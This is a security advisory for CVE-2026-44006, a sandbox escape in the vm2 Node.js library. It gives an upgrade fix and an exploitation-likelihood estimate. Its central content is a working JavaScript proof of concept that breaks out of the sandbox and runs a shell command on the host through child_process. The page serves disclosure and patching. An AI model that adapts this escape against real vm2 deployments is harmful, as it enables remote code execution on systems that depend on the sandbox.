CVE-2026-44006
vm2 has a Sandbox Escape Vulnerability
Description
### Summary It is possible to reach `BaseHandler.getPrototypeOf`, which can be used to get arbitrary prototypes ### Details https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658 `BaseHandler` can be reached via `util.inspect` (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8) ### PoC ```js let obj = { subarray: Buffer.prototype.inspect, slice: Buffer.prototype.slice, hexSlice: () => '', }; let sym; obj.slice(10, { showHidden: true, showProxy: true, depth: 10, stylize(a) { const handler = this.seen && this.seen[1]; if (handler && handler.getPrototypeOf) { gP = handler.getPrototypeOf; HObjectProto = gP(gP(gP(gP(Buffer)))); HObject = HObjectProto.constructor; sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); } return a; }, }); obj = { [sym]: (depth, opt, inspect) => { inspect.constructor('return process')() .getBuiltinModule('child_process') .execSync('id', { stdio: 'inherit' }); }, valueOf: undefined, constructor: undefined, }; WebAssembly.compileStreaming(obj).catch(() => {}); ``` ### Impact Sandbox Escape -> RCE
How to fix CVE-2026-44006
To remediate CVE-2026-44006, upgrade the affected package to a fixed version below.
- —upgrade to 3.11.0 or later
Is CVE-2026-44006 being exploited?
Low — EPSS is 0.1%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 3.11.0